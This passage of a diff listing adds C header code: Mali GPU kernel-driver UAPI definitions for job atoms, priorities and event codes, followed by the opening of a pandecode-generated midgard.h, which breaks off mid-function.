607	+	*
608	+	* This allows dependency only atoms to have flags set
609	+	*/
610	+	#define BASE_JD_REQ_ATOM_TYPE \
611	+	(BASE_JD_REQ_FS \| BASE_JD_REQ_CS \| BASE_JD_REQ_T \| BASE_JD_REQ_CF \| \
612	+	BASE_JD_REQ_V \| BASE_JD_REQ_SOFT_JOB \| BASE_JD_REQ_ONLY_COMPUTE)
613	+
614	+	/**
615	+	* Mask of all bits in base_jd_core_req that control the type of a soft job.
616	+	*/
617	+	#define BASE_JD_REQ_SOFT_JOB_TYPE (BASE_JD_REQ_SOFT_JOB \| 0x1f)
618	+
619	+	/* Returns non-zero value if core requirements passed define a soft job or
620	+	* a dependency only job.
621	+	*/
622	+	#define BASE_JD_REQ_SOFT_JOB_OR_DEP(core_req) \
623	+	(((core_req) & BASE_JD_REQ_SOFT_JOB) \|\| \
624	+	((core_req) & BASE_JD_REQ_ATOM_TYPE) == BASE_JD_REQ_DEP)
625	+
626	+	/**
627	+	* enum kbase_jd_atom_state
628	+	*
629	+	* @KBASE_JD_ATOM_STATE_UNUSED: Atom is not used.
630	+	* @KBASE_JD_ATOM_STATE_QUEUED: Atom is queued in JD.
631	+	* @KBASE_JD_ATOM_STATE_IN_JS: Atom has been given to JS (is runnable/running).
632	+	* @KBASE_JD_ATOM_STATE_HW_COMPLETED: Atom has been completed, but not yet
633	+	* handed back to job dispatcher for
634	+	* dependency resolution.
635	+	* @KBASE_JD_ATOM_STATE_COMPLETED: Atom has been completed, but not yet handed
636	+	* back to userspace.
637	+	*/
638	+	enum kbase_jd_atom_state {
639	+	KBASE_JD_ATOM_STATE_UNUSED,
640	+	KBASE_JD_ATOM_STATE_QUEUED,
641	+	KBASE_JD_ATOM_STATE_IN_JS,
642	+	KBASE_JD_ATOM_STATE_HW_COMPLETED,
643	+	KBASE_JD_ATOM_STATE_COMPLETED
644	+	};
645	+
646	+	/**
647	+	* typedef base_atom_id - Type big enough to store an atom number in.
648	+	*/
649	+	typedef __u8 base_atom_id;
650	+
651	+	/**
652	+	* struct base_dependency -
653	+	*
654	+	* @atom_id: An atom number
655	+	* @dependency_type: Dependency type
656	+	*/
657	+	struct base_dependency {
658	+	base_atom_id atom_id;
659	+	base_jd_dep_type dependency_type;
660	+	};
661	+
662	+	/**
663	+	* struct base_jd_fragment - Set of GPU fragment job chains used for rendering.
664	+	*
665	+	* @norm_read_norm_write: Job chain for full rendering.
666	+	* GPU address of a fragment job chain to render in the
667	+	* circumstance where the tiler job chain did not exceed
668	+	* its memory usage threshold and no fragment job chain
669	+	* was previously run for the same renderpass.
670	+	* It is used no more than once per renderpass.
671	+	* @norm_read_forced_write: Job chain for starting incremental
672	+	* rendering.
673	+	* GPU address of a fragment job chain to render in
674	+	* the circumstance where the tiler job chain exceeded
675	+	* its memory usage threshold for the first time and
676	+	* no fragment job chain was previously run for the
677	+	* same renderpass.
678	+	* Writes unresolved multisampled and normally-
679	+	* discarded output to temporary buffers that must be
680	+	* read back by a subsequent forced_read job chain
681	+	* before the renderpass is complete.
682	+	* It is used no more than once per renderpass.
683	+	* @forced_read_forced_write: Job chain for continuing incremental
684	+	* rendering.
685	+	* GPU address of a fragment job chain to render in
686	+	* the circumstance where the tiler job chain
687	+	* exceeded its memory usage threshold again
688	+	* and a fragment job chain was previously run for
689	+	* the same renderpass.
690	+	* Reads unresolved multisampled and
691	+	* normally-discarded output from temporary buffers
692	+	* written by a previous forced_write job chain and
693	+	* writes the same to temporary buffers again.
694	+	* It is used as many times as required until
695	+	* rendering completes.
696	+	* @forced_read_norm_write: Job chain for ending incremental rendering.
697	+	* GPU address of a fragment job chain to render in the
698	+	* circumstance where the tiler job chain did not
699	+	* exceed its memory usage threshold this time and a
700	+	* fragment job chain was previously run for the same
701	+	* renderpass.
702	+	* Reads unresolved multisampled and normally-discarded
703	+	* output from temporary buffers written by a previous
704	+	* forced_write job chain in order to complete a
705	+	* renderpass.
706	+	* It is used no more than once per renderpass.
707	+	*
708	+	* This structure is referenced by the main atom structure if
709	+	* BASE_JD_REQ_END_RENDERPASS is set in the base_jd_core_req.
710	+	*/
711	+	struct base_jd_fragment {
712	+	__u64 norm_read_norm_write;
713	+	__u64 norm_read_forced_write;
714	+	__u64 forced_read_forced_write;
715	+	__u64 forced_read_norm_write;
716	+	};
717	+
718	+	/**
719	+	* typedef base_jd_prio - Base Atom priority.
720	+	*
721	+	* Only certain priority levels are actually implemented, as specified by the
722	+	* BASE_JD_PRIO_<...> definitions below. It is undefined to use a priority
723	+	* level that is not one of those defined below.
724	+	*
725	+	* Priority levels only affect scheduling after the atoms have had dependencies
726	+	* resolved. For example, a low priority atom that has had its dependencies
727	+	* resolved might run before a higher priority atom that has not had its
728	+	* dependencies resolved.
729	+	*
730	+	* In general, fragment atoms do not affect non-fragment atoms with
731	+	* lower priorities, and vice versa. One exception is that there is only one
732	+	* priority value for each context. So a high-priority (e.g.) fragment atom
733	+	* could increase its context priority, causing its non-fragment atoms to also
734	+	* be scheduled sooner.
735	+	*
736	+	* The atoms are scheduled as follows with respect to their priorities:
737	+	* * Let atoms 'X' and 'Y' be for the same job slot who have dependencies
738	+	* resolved, and atom 'X' has a higher priority than atom 'Y'
739	+	* * If atom 'Y' is currently running on the HW, then it is interrupted to
740	+	* allow atom 'X' to run soon after
741	+	* * If instead neither atom 'Y' nor atom 'X' are running, then when choosing
742	+	* the next atom to run, atom 'X' will always be chosen instead of atom 'Y'
743	+	* * Any two atoms that have the same priority could run in any order with
744	+	* respect to each other. That is, there is no ordering constraint between
745	+	* atoms of the same priority.
746	+	*
747	+	* The sysfs file 'js_ctx_scheduling_mode' is used to control how atoms are
748	+	* scheduled between contexts. The default value, 0, will cause higher-priority
749	+	* atoms to be scheduled first, regardless of their context. The value 1 will
750	+	* use a round-robin algorithm when deciding which context's atoms to schedule
751	+	* next, so higher-priority atoms can only preempt lower priority atoms within
752	+	* the same context. See KBASE_JS_SYSTEM_PRIORITY_MODE and
753	+	* KBASE_JS_PROCESS_LOCAL_PRIORITY_MODE for more details.
754	+	*/
755	+	typedef __u8 base_jd_prio;
756	+
757	+	/* Medium atom priority. This is a priority higher than BASE_JD_PRIO_LOW */
758	+	#define BASE_JD_PRIO_MEDIUM ((base_jd_prio)0)
759	+	/* High atom priority. This is a priority higher than BASE_JD_PRIO_MEDIUM and
760	+	* BASE_JD_PRIO_LOW
761	+	*/
762	+	#define BASE_JD_PRIO_HIGH ((base_jd_prio)1)
763	+	/* Low atom priority. */
764	+	#define BASE_JD_PRIO_LOW ((base_jd_prio)2)
765	+	/* Real-Time atom priority. This is a priority higher than BASE_JD_PRIO_HIGH,
766	+	* BASE_JD_PRIO_MEDIUM, and BASE_JD_PRIO_LOW
767	+	*/
768	+	#define BASE_JD_PRIO_REALTIME ((base_jd_prio)3)
769	+
770	+	/* Count of the number of priority levels. This itself is not a valid
771	+	* base_jd_prio setting
772	+	*/
773	+	#define BASE_JD_NR_PRIO_LEVELS 4
774	+
775	+	/**
776	+	* struct base_jd_atom_v2 - Node of a dependency graph used to submit a
777	+	* GPU job chain or soft-job to the kernel driver.
778	+	*
779	+	* @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS
780	+	* is set in the base_jd_core_req) the CPU address of a
781	+	* base_jd_fragment object.
782	+	* @udata: User data.
783	+	* @extres_list: List of external resources.
784	+	* @nr_extres: Number of external resources or JIT allocations.
785	+	* @jit_id: Zero-terminated array of IDs of just-in-time memory
786	+	* allocations written to by the atom. When the atom
787	+	* completes, the value stored at the
788	+	* &struct_base_jit_alloc_info.heap_info_gpu_addr of
789	+	* each allocation is read in order to enforce an
790	+	* overall physical memory usage limit.
791	+	* @pre_dep: Pre-dependencies. One need to use SETTER function to assign
792	+	* this field; this is done in order to reduce possibility of
793	+	* improper assignment of a dependency field.
794	+	* @atom_number: Unique number to identify the atom.
795	+	* @prio: Atom priority. Refer to base_jd_prio for more details.
796	+	* @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP
797	+	* specified.
798	+	* @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified.
799	+	* @core_req: Core requirements.
800	+	* @renderpass_id: Renderpass identifier used to associate an atom that has
801	+	* BASE_JD_REQ_START_RENDERPASS set in its core requirements
802	+	* with an atom that has BASE_JD_REQ_END_RENDERPASS set.
803	+	* @padding: Unused. Must be zero.
804	+	*
805	+	* This structure has changed since UK 10.2 for which base_jd_core_req was a
806	+	* __u16 value.
807	+	*
808	+	* In UK 10.3 a core_req field of a __u32 type was added to the end of the
809	+	* structure, and the place in the structure previously occupied by __u16
810	+	* core_req was kept but renamed to compat_core_req.
811	+	*
812	+	* From UK 11.20 - compat_core_req is now occupied by __u8 jit_id[2].
813	+	* Compatibility with UK 10.x from UK 11.y is not handled because
814	+	* the major version increase prevents this.
815	+	*
816	+	* For UK 11.20 jit_id[2] must be initialized to zero.
817	+	*/
818	+	struct base_jd_atom_v2 {
819	+	__u64 jc;
820	+	struct base_jd_udata udata;
821	+	__u64 extres_list;
822	+	__u16 nr_extres;
823	+	__u8 jit_id[2];
824	+	struct base_dependency pre_dep[2];
825	+	base_atom_id atom_number;
826	+	base_jd_prio prio;
827	+	__u8 device_nr;
828	+	__u8 jobslot;
829	+	base_jd_core_req core_req;
830	+	__u8 renderpass_id;
831	+	__u8 padding[7];
832	+	};
833	+
834	+	/**
835	+	* struct base_jd_atom - Same as base_jd_atom_v2, but has an extra seq_nr
836	+	* at the beginning.
837	+	*
838	+	* @seq_nr: Sequence number of logical grouping of atoms.
839	+	* @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS
840	+	* is set in the base_jd_core_req) the CPU address of a
841	+	* base_jd_fragment object.
842	+	* @udata: User data.
843	+	* @extres_list: List of external resources.
844	+	* @nr_extres: Number of external resources or JIT allocations.
845	+	* @jit_id: Zero-terminated array of IDs of just-in-time memory
846	+	* allocations written to by the atom. When the atom
847	+	* completes, the value stored at the
848	+	* &struct_base_jit_alloc_info.heap_info_gpu_addr of
849	+	* each allocation is read in order to enforce an
850	+	* overall physical memory usage limit.
851	+	* @pre_dep: Pre-dependencies. One need to use SETTER function to assign
852	+	* this field; this is done in order to reduce possibility of
853	+	* improper assignment of a dependency field.
854	+	* @atom_number: Unique number to identify the atom.
855	+	* @prio: Atom priority. Refer to base_jd_prio for more details.
856	+	* @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP
857	+	* specified.
858	+	* @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified.
859	+	* @core_req: Core requirements.
860	+	* @renderpass_id: Renderpass identifier used to associate an atom that has
861	+	* BASE_JD_REQ_START_RENDERPASS set in its core requirements
862	+	* with an atom that has BASE_JD_REQ_END_RENDERPASS set.
863	+	* @padding: Unused. Must be zero.
864	+	*/
865	+	typedef struct base_jd_atom {
866	+	__u64 seq_nr;
867	+	__u64 jc;
868	+	struct base_jd_udata udata;
869	+	__u64 extres_list;
870	+	__u16 nr_extres;
871	+	__u8 jit_id[2];
872	+	struct base_dependency pre_dep[2];
873	+	base_atom_id atom_number;
874	+	base_jd_prio prio;
875	+	__u8 device_nr;
876	+	__u8 jobslot;
877	+	base_jd_core_req core_req;
878	+	__u8 renderpass_id;
879	+	__u8 padding[7];
880	+	} base_jd_atom;
881	+
882	+	/* Job chain event code bits
883	+	* Defines the bits used to create ::base_jd_event_code
884	+	*/
885	+	enum {
886	+	BASE_JD_SW_EVENT_KERNEL = (1u << 15), /* Kernel side event */
887	+	BASE_JD_SW_EVENT = (1u << 14), /* SW defined event */
888	+	/* Event indicates success (SW events only) */
889	+	BASE_JD_SW_EVENT_SUCCESS = (1u << 13),
890	+	BASE_JD_SW_EVENT_JOB = (0u << 11), /* Job related event */
891	+	BASE_JD_SW_EVENT_BAG = (1u << 11), /* Bag related event */
892	+	BASE_JD_SW_EVENT_INFO = (2u << 11), /* Misc/info event */
893	+	BASE_JD_SW_EVENT_RESERVED = (3u << 11), /* Reserved event type */
894	+	/* Mask to extract the type from an event code */
895	+	BASE_JD_SW_EVENT_TYPE_MASK = (3u << 11)
896	+	};
897	+
898	+	/**
899	+	* enum base_jd_event_code - Job chain event codes
900	+	*
901	+	* @BASE_JD_EVENT_RANGE_HW_NONFAULT_START: Start of hardware non-fault status
902	+	* codes.
903	+	* Obscurely, BASE_JD_EVENT_TERMINATED
904	+	* indicates a real fault, because the
905	+	* job was hard-stopped.
906	+	* @BASE_JD_EVENT_NOT_STARTED: Can't be seen by userspace, treated as
907	+	* 'previous job done'.
908	+	* @BASE_JD_EVENT_STOPPED: Can't be seen by userspace, becomes
909	+	* TERMINATED, DONE or JOB_CANCELLED.
910	+	* @BASE_JD_EVENT_TERMINATED: This is actually a fault status code - the job
911	+	* was hard stopped.
912	+	* @BASE_JD_EVENT_ACTIVE: Can't be seen by userspace, jobs only returned on
913	+	* complete/fail/cancel.
914	+	* @BASE_JD_EVENT_RANGE_HW_NONFAULT_END: End of hardware non-fault status codes.
915	+	* Obscurely, BASE_JD_EVENT_TERMINATED
916	+	* indicates a real fault,
917	+	* because the job was hard-stopped.
918	+	* @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START: Start of hardware fault and
919	+	* software error status codes.
920	+	* @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END: End of hardware fault and
921	+	* software error status codes.
922	+	* @BASE_JD_EVENT_RANGE_SW_SUCCESS_START: Start of software success status
923	+	* codes.
924	+	* @BASE_JD_EVENT_RANGE_SW_SUCCESS_END: End of software success status codes.
925	+	* @BASE_JD_EVENT_RANGE_KERNEL_ONLY_START: Start of kernel-only status codes.
926	+	* Such codes are never returned to
927	+	* user-space.
928	+	* @BASE_JD_EVENT_RANGE_KERNEL_ONLY_END: End of kernel-only status codes.
929	+	* @BASE_JD_EVENT_DONE: atom has completed successfull
930	+	* @BASE_JD_EVENT_JOB_CONFIG_FAULT: Atom dependencies configuration error which
931	+	* shall result in a failed atom
932	+	* @BASE_JD_EVENT_JOB_POWER_FAULT: The job could not be executed because the
933	+	* part of the memory system required to access
934	+	* job descriptors was not powered on
935	+	* @BASE_JD_EVENT_JOB_READ_FAULT: Reading a job descriptor into the Job
936	+	* manager failed
937	+	* @BASE_JD_EVENT_JOB_WRITE_FAULT: Writing a job descriptor from the Job
938	+	* manager failed
939	+	* @BASE_JD_EVENT_JOB_AFFINITY_FAULT: The job could not be executed because the
940	+	* specified affinity mask does not intersect
941	+	* any available cores
942	+	* @BASE_JD_EVENT_JOB_BUS_FAULT: A bus access failed while executing a job
943	+	* @BASE_JD_EVENT_INSTR_INVALID_PC: A shader instruction with an illegal program
944	+	* counter was executed.
945	+	* @BASE_JD_EVENT_INSTR_INVALID_ENC: A shader instruction with an illegal
946	+	* encoding was executed.
947	+	* @BASE_JD_EVENT_INSTR_TYPE_MISMATCH: A shader instruction was executed where
948	+	* the instruction encoding did not match the
949	+	* instruction type encoded in the program
950	+	* counter.
951	+	* @BASE_JD_EVENT_INSTR_OPERAND_FAULT: A shader instruction was executed that
952	+	* contained invalid combinations of operands.
953	+	* @BASE_JD_EVENT_INSTR_TLS_FAULT: A shader instruction was executed that tried
954	+	* to access the thread local storage section
955	+	* of another thread.
956	+	* @BASE_JD_EVENT_INSTR_ALIGN_FAULT: A shader instruction was executed that
957	+	* tried to do an unsupported unaligned memory
958	+	* access.
959	+	* @BASE_JD_EVENT_INSTR_BARRIER_FAULT: A shader instruction was executed that
960	+	* failed to complete an instruction barrier.
961	+	* @BASE_JD_EVENT_DATA_INVALID_FAULT: Any data structure read as part of the job
962	+	* contains invalid combinations of data.
963	+	* @BASE_JD_EVENT_TILE_RANGE_FAULT: Tile or fragment shading was asked to
964	+	* process a tile that is entirely outside the
965	+	* bounding box of the frame.
966	+	* @BASE_JD_EVENT_STATE_FAULT: Matches ADDR_RANGE_FAULT. A virtual address
967	+	* has been found that exceeds the virtual
968	+	* address range.
969	+	* @BASE_JD_EVENT_OUT_OF_MEMORY: The tiler ran out of memory when executing a job.
970	+	* @BASE_JD_EVENT_UNKNOWN: If multiple jobs in a job chain fail, only
971	+	* the first one the reports an error will set
972	+	* and return full error information.
973	+	* Subsequent failing jobs will not update the
974	+	* error status registers, and may write an
975	+	* error status of UNKNOWN.
976	+	* @BASE_JD_EVENT_DELAYED_BUS_FAULT: The GPU received a bus fault for access to
977	+	* physical memory where the original virtual
978	+	* address is no longer available.
979	+	* @BASE_JD_EVENT_SHAREABILITY_FAULT: Matches GPU_SHAREABILITY_FAULT. A cache
980	+	* has detected that the same line has been
981	+	* accessed as both shareable and non-shareable
982	+	* memory from inside the GPU.
983	+	* @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1: A memory access hit an invalid table
984	+	* entry at level 1 of the translation table.
985	+	* @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2: A memory access hit an invalid table
986	+	* entry at level 2 of the translation table.
987	+	* @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3: A memory access hit an invalid table
988	+	* entry at level 3 of the translation table.
989	+	* @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4: A memory access hit an invalid table
990	+	* entry at level 4 of the translation table.
991	+	* @BASE_JD_EVENT_PERMISSION_FAULT: A memory access could not be allowed due to
992	+	* the permission flags set in translation
993	+	* table
994	+	* @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1: A bus fault occurred while reading
995	+	* level 0 of the translation tables.
996	+	* @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2: A bus fault occurred while reading
997	+	* level 1 of the translation tables.
998	+	* @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3: A bus fault occurred while reading
999	+	* level 2 of the translation tables.
1000	+	* @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4: A bus fault occurred while reading
1001	+	* level 3 of the translation tables.
1002	+	* @BASE_JD_EVENT_ACCESS_FLAG: Matches ACCESS_FLAG_0. A memory access hit a
1003	+	* translation table entry with the ACCESS_FLAG
1004	+	* bit set to zero in level 0 of the
1005	+	* page table, and the DISABLE_AF_FAULT flag
1006	+	* was not set.
1007	+	* @BASE_JD_EVENT_MEM_GROWTH_FAILED: raised for JIT_ALLOC atoms that failed to
1008	+	* grow memory on demand
1009	+	* @BASE_JD_EVENT_JOB_CANCELLED: raised when this atom was hard-stopped or its
1010	+	* dependencies failed
1011	+	* @BASE_JD_EVENT_JOB_INVALID: raised for many reasons, including invalid data
1012	+	* in the atom which overlaps with
1013	+	* BASE_JD_EVENT_JOB_CONFIG_FAULT, or if the
1014	+	* platform doesn't support the feature specified in
1015	+	* the atom.
1016	+	* @BASE_JD_EVENT_PM_EVENT: TODO: remove as it's not used
1017	+	* @BASE_JD_EVENT_TIMED_OUT: TODO: remove as it's not used
1018	+	* @BASE_JD_EVENT_BAG_INVALID: TODO: remove as it's not used
1019	+	* @BASE_JD_EVENT_PROGRESS_REPORT: TODO: remove as it's not used
1020	+	* @BASE_JD_EVENT_BAG_DONE: TODO: remove as it's not used
1021	+	* @BASE_JD_EVENT_DRV_TERMINATED: this is a special event generated to indicate
1022	+	* to userspace that the KBase context has been
1023	+	* destroyed and Base should stop listening for
1024	+	* further events
1025	+	* @BASE_JD_EVENT_REMOVED_FROM_NEXT: raised when an atom that was configured in
1026	+	* the GPU has to be retried (but it has not
1027	+	* started) due to e.g., GPU reset
1028	+	* @BASE_JD_EVENT_END_RP_DONE: this is used for incremental rendering to signal
1029	+	* the completion of a renderpass. This value
1030	+	* shouldn't be returned to userspace but I haven't
1031	+	* seen where it is reset back to JD_EVENT_DONE.
1032	+	*
1033	+	* HW and low-level SW events are represented by event codes.
1034	+	* The status of jobs which succeeded are also represented by
1035	+	* an event code (see @BASE_JD_EVENT_DONE).
1036	+	* Events are usually reported as part of a &struct base_jd_event.
1037	+	*
1038	+	* The event codes are encoded in the following way:
1039	+	* * 10:0 - subtype
1040	+	* * 12:11 - type
1041	+	* * 13 - SW success (only valid if the SW bit is set)
1042	+	* * 14 - SW event (HW event if not set)
1043	+	* * 15 - Kernel event (should never be seen in userspace)
1044	+	*
1045	+	* Events are split up into ranges as follows:
1046	+	* * BASE_JD_EVENT_RANGE_<description>_START
1047	+	* * BASE_JD_EVENT_RANGE_<description>_END
1048	+	*
1049	+	* code is in <description>'s range when:
1050	+	* BASE_JD_EVENT_RANGE_<description>_START <= code <
1051	+	* BASE_JD_EVENT_RANGE_<description>_END
1052	+	*
1053	+	* Ranges can be asserted for adjacency by testing that the END of the previous
1054	+	* is equal to the START of the next. This is useful for optimizing some tests
1055	+	* for range.
1056	+	*
1057	+	* A limitation is that the last member of this enum must explicitly be handled
1058	+	* (with an assert-unreachable statement) in switch statements that use
1059	+	* variables of this type. Otherwise, the compiler warns that we have not
1060	+	* handled that enum value.
1061	+	*/
1062	+	enum base_jd_event_code {
1063	+	/* HW defined exceptions */
1064	+	BASE_JD_EVENT_RANGE_HW_NONFAULT_START = 0,
1065	+
1066	+	/* non-fatal exceptions */
1067	+	BASE_JD_EVENT_NOT_STARTED = 0x00,
1068	+	BASE_JD_EVENT_DONE = 0x01,
1069	+	BASE_JD_EVENT_STOPPED = 0x03,
1070	+	BASE_JD_EVENT_TERMINATED = 0x04,
1071	+	BASE_JD_EVENT_ACTIVE = 0x08,
1072	+
1073	+	BASE_JD_EVENT_RANGE_HW_NONFAULT_END = 0x40,
1074	+	BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START = 0x40,
1075	+
1076	+	/* job exceptions */
1077	+	BASE_JD_EVENT_JOB_CONFIG_FAULT = 0x40,
1078	+	BASE_JD_EVENT_JOB_POWER_FAULT = 0x41,
1079	+	BASE_JD_EVENT_JOB_READ_FAULT = 0x42,
1080	+	BASE_JD_EVENT_JOB_WRITE_FAULT = 0x43,
1081	+	BASE_JD_EVENT_JOB_AFFINITY_FAULT = 0x44,
1082	+	BASE_JD_EVENT_JOB_BUS_FAULT = 0x48,
1083	+	BASE_JD_EVENT_INSTR_INVALID_PC = 0x50,
1084	+	BASE_JD_EVENT_INSTR_INVALID_ENC = 0x51,
1085	+	BASE_JD_EVENT_INSTR_TYPE_MISMATCH = 0x52,
1086	+	BASE_JD_EVENT_INSTR_OPERAND_FAULT = 0x53,
1087	+	BASE_JD_EVENT_INSTR_TLS_FAULT = 0x54,
1088	+	BASE_JD_EVENT_INSTR_BARRIER_FAULT = 0x55,
1089	+	BASE_JD_EVENT_INSTR_ALIGN_FAULT = 0x56,
1090	+	BASE_JD_EVENT_DATA_INVALID_FAULT = 0x58,
1091	+	BASE_JD_EVENT_TILE_RANGE_FAULT = 0x59,
1092	+	BASE_JD_EVENT_STATE_FAULT = 0x5A,
1093	+	BASE_JD_EVENT_OUT_OF_MEMORY = 0x60,
1094	+	BASE_JD_EVENT_UNKNOWN = 0x7F,
1095	+
1096	+	/* GPU exceptions */
1097	+	BASE_JD_EVENT_DELAYED_BUS_FAULT = 0x80,
1098	+	BASE_JD_EVENT_SHAREABILITY_FAULT = 0x88,
1099	+
1100	+	/* MMU exceptions */
1101	+	BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1 = 0xC1,
1102	+	BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2 = 0xC2,
1103	+	BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3 = 0xC3,
1104	+	BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4 = 0xC4,
1105	+	BASE_JD_EVENT_PERMISSION_FAULT = 0xC8,
1106	+	BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1 = 0xD1,
1107	+	BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2 = 0xD2,
1108	+	BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3 = 0xD3,
1109	+	BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4 = 0xD4,
1110	+	BASE_JD_EVENT_ACCESS_FLAG = 0xD8,
1111	+
1112	+	/* SW defined exceptions */
1113	+	BASE_JD_EVENT_MEM_GROWTH_FAILED =
1114	+	BASE_JD_SW_EVENT \| BASE_JD_SW_EVENT_JOB \| 0x000,
1115	+	BASE_JD_EVENT_TIMED_OUT =
1116	+	BASE_JD_SW_EVENT \| BASE_JD_SW_EVENT_JOB \| 0x001,
1117	+	BASE_JD_EVENT_JOB_CANCELLED =
1118	+	BASE_JD_SW_EVENT \| BASE_JD_SW_EVENT_JOB \| 0x002,
1119	+	BASE_JD_EVENT_JOB_INVALID =
1120	+	BASE_JD_SW_EVENT \| BASE_JD_SW_EVENT_JOB \| 0x003,
1121	+	BASE_JD_EVENT_PM_EVENT =
1122	+	BASE_JD_SW_EVENT \| BASE_JD_SW_EVENT_JOB \| 0x004,
1123	+
1124	+	BASE_JD_EVENT_BAG_INVALID =
1125	+	BASE_JD_SW_EVENT \| BASE_JD_SW_EVENT_BAG \| 0x003,
1126	+
1127	+	BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END = BASE_JD_SW_EVENT \|
1128	+	BASE_JD_SW_EVENT_RESERVED \| 0x3FF,
1129	+
1130	+	BASE_JD_EVENT_RANGE_SW_SUCCESS_START = BASE_JD_SW_EVENT \|
1131	+	BASE_JD_SW_EVENT_SUCCESS \| 0x000,
1132	+
1133	+	BASE_JD_EVENT_PROGRESS_REPORT = BASE_JD_SW_EVENT \|
1134	+	BASE_JD_SW_EVENT_SUCCESS \| BASE_JD_SW_EVENT_JOB \| 0x000,
1135	+	BASE_JD_EVENT_BAG_DONE = BASE_JD_SW_EVENT \| BASE_JD_SW_EVENT_SUCCESS \|
1136	+	BASE_JD_SW_EVENT_BAG \| 0x000,
1137	+	BASE_JD_EVENT_DRV_TERMINATED = BASE_JD_SW_EVENT \|
1138	+	BASE_JD_SW_EVENT_SUCCESS \| BASE_JD_SW_EVENT_INFO \| 0x000,
1139	+
1140	+	BASE_JD_EVENT_RANGE_SW_SUCCESS_END = BASE_JD_SW_EVENT \|
1141	+	BASE_JD_SW_EVENT_SUCCESS \| BASE_JD_SW_EVENT_RESERVED \| 0x3FF,
1142	+
1143	+	BASE_JD_EVENT_RANGE_KERNEL_ONLY_START = BASE_JD_SW_EVENT \|
1144	+	BASE_JD_SW_EVENT_KERNEL \| 0x000,
1145	+	BASE_JD_EVENT_REMOVED_FROM_NEXT = BASE_JD_SW_EVENT \|
1146	+	BASE_JD_SW_EVENT_KERNEL \| BASE_JD_SW_EVENT_JOB \| 0x000,
1147	+	BASE_JD_EVENT_END_RP_DONE = BASE_JD_SW_EVENT \|
1148	+	BASE_JD_SW_EVENT_KERNEL \| BASE_JD_SW_EVENT_JOB \| 0x001,
1149	+
1150	+	BASE_JD_EVENT_RANGE_KERNEL_ONLY_END = BASE_JD_SW_EVENT \|
1151	+	BASE_JD_SW_EVENT_KERNEL \| BASE_JD_SW_EVENT_RESERVED \| 0x3FF
1152	+	};
1153	+
1154	+	/**
1155	+	* struct base_jd_event_v2 - Event reporting structure
1156	+	*
1157	+	* @event_code: event code.
1158	+	* @atom_number: the atom number that has completed.
1159	+	* @udata: user data.
1160	+	*
1161	+	* This structure is used by the kernel driver to report information
1162	+	* about GPU events. They can either be HW-specific events or low-level
1163	+	* SW events, such as job-chain completion.
1164	+	*
1165	+	* The event code contains an event type field which can be extracted
1166	+	* by ANDing with BASE_JD_SW_EVENT_TYPE_MASK.
1167	+	*/
1168	+	struct base_jd_event_v2 {
1169	+	enum base_jd_event_code event_code;
1170	+	base_atom_id atom_number;
1171	+	struct base_jd_udata udata;
1172	+	};
1173	+
1174	+	/**
1175	+	* struct base_dump_cpu_gpu_counters - Structure for
1176	+	* BASE_JD_REQ_SOFT_DUMP_CPU_GPU_COUNTERS
1177	+	* jobs.
1178	+	* @system_time: gpu timestamp
1179	+	* @cycle_counter: gpu cycle count
1180	+	* @sec: cpu time(sec)
1181	+	* @usec: cpu time(usec)
1182	+	* @padding: padding
1183	+	*
1184	+	* This structure is stored into the memory pointed to by the @jc field
1185	+	* of &struct base_jd_atom.
1186	+	*
1187	+	* It must not occupy the same CPU cache line(s) as any neighboring data.
1188	+	* This is to avoid cases where access to pages containing the structure
1189	+	* is shared between cached and un-cached memory regions, which would
1190	+	* cause memory corruption.
1191	+	*/
1192	+
1193	+	struct base_dump_cpu_gpu_counters {
1194	+	__u64 system_time;
1195	+	__u64 cycle_counter;
1196	+	__u64 sec;
1197	+	__u32 usec;
1198	+	__u8 padding[36];
1199	+	};
1200	+
1201	+	#endif /* _UAPI_BASE_JM_KERNEL_H_ */
1202	+
1203	+

■ ■ ■ ■ ■ ■

midgard.h

1	+	#ifndef MIDGARD_H
2	+	#define MIDGARD_H
3	+
4	+	//Generated using pandecode-standalone: https://gitlab.freedesktop.org/panfrost/pandecode-standalone
5	+
6	+	#include <stdio.h>
7	+	#include <stdint.h>
8	+	#include <stdbool.h>
9	+	#include <assert.h>
10	+	#include <math.h>
11	+	#include <inttypes.h>
12	+	#include <string.h>
13	+
14	+	#define pan_section_ptr(base, A, S) \
15	+	((void )((uint8_t )(base) + MALI_ ## A ## _SECTION_ ## S ## _OFFSET))
16	+
17	+	#define pan_section_pack(dst, A, S, name) \
18	+	for (MALI_ ## A ## _SECTION_ ## S ## _TYPE name = { MALI_ ## A ## _SECTION_ ## S ## _header }, \
19	+	_loop_terminate = (void ) (dst); \
20	+	__builtin_expect(_loop_terminate != NULL, 1); \
21	+	({ MALI_ ## A ## _SECTION_ ## S ## _pack(pan_section_ptr(dst, A, S), &name); \
22	+	_loop_terminate = NULL; }))
23	+
24	+
25	+	static inline uint64_t
26	+	__gen_uint(uint64_t v, uint32_t start, uint32_t end)
27	+	{
